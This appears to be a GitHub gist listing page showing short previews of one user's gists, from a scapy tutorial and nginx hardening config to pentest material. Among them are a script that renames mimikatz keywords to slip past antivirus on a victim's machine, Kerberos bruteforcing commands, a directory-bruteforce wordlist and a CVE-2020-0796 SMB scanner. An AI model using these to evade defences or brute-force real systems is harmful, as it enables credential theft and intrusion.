@gnebbia
gnebbia / scapy.txt
Created November 5, 2021 12:42
scapy tutorial
# scapy
# scapy is cool and works flawlessly
# If you ever think about using pyshark, as of September 2020 don't!
# pyshark, although supporting a lot of protocols, has a lot of bugs.
# NOTE: A high level network sniffer reporting some stats is YAS:
# https://github.com/redcode-labs/YAS
## Getting Help
@gnebbia
gnebbia / pt_to_install.txt
Last active September 23, 2021 21:54
Pentest/CTF Tools
# Tools
nmap
metasploit
wpscan
burpsuite
rustscan
python
hydra
ncrack
john
@gnebbia
gnebbia / gemini-resources.txt
Created September 23, 2021 08:02
A collection of interesting gemini resources
# Cool Gemini Capsules
# Docs about Gemini and useful resources (Start Here)
gemini://gemini.circumlunar.space
gemini://gemini.circumlunar.space/docs/faq.gmi
gemini://geminiquickst.art/
# Search Engines
gemini://geminispace.info
@gnebbia
gnebbia / bug-bounty-wordlist.txt
Created April 16, 2021 09:02 — forked from EdOverflow/bug-bounty-wordlist.txt
Good short wordlist for directory bruteforcing.
cgi-bin
images
admin
includes
modules
templates
cache
media
js
language
@gnebbia
gnebbia / nginx.conf
Created March 17, 2021 01:30 — forked from plentz/nginx.conf
Best nginx configuration for improved security (and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@gnebbia
gnebbia / mimikatz_obfuscator.sh
Created September 17, 2020 09:43 — forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@gnebbia
gnebbia / CleanArchitecture.md
Created September 10, 2020 11:50 — forked from ygrenzinger/CleanArchitecture.md
Summary of Clean Architecture by Robert C. Martin

Summary of book "Clean Architecture" by Robert C. Martin

Uncle Bob, the well-known author of Clean Code, is coming back to us with a new book called Clean Architecture which wants to take a larger view on how to create software.

Even if Clean Code is one of the major books around OOP and code design (mainly by presenting the SOLID principles), I was not totally impressed by the book.

Clean Architecture leaves me with the same feeling, even if it's pushing the development world to do better, has some good stories and presents robust principles to build software.

The book is built around 34 chapters organised in chapters.

@gnebbia
gnebbia / check-smb-v3.11.sh
Created May 13, 2020 00:01 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
# Require exactly one target (single host or CIDR range)
if [ $# -eq 0 ]
then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi
echo "Checking if there's SMB v3.11 in $1 ..."
# Quote the target so it is passed to nmap as a single argument
nmap -p445 --script smb-protocols -Pn -n "$1" | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@gnebbia
gnebbia / kerberos_attacks_cheatsheet.md
Created February 20, 2020 19:32 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@gnebbia
gnebbia / README.md
Created January 4, 2020 21:39 — forked from hofmannsven/README.md
Command Line Cheatsheet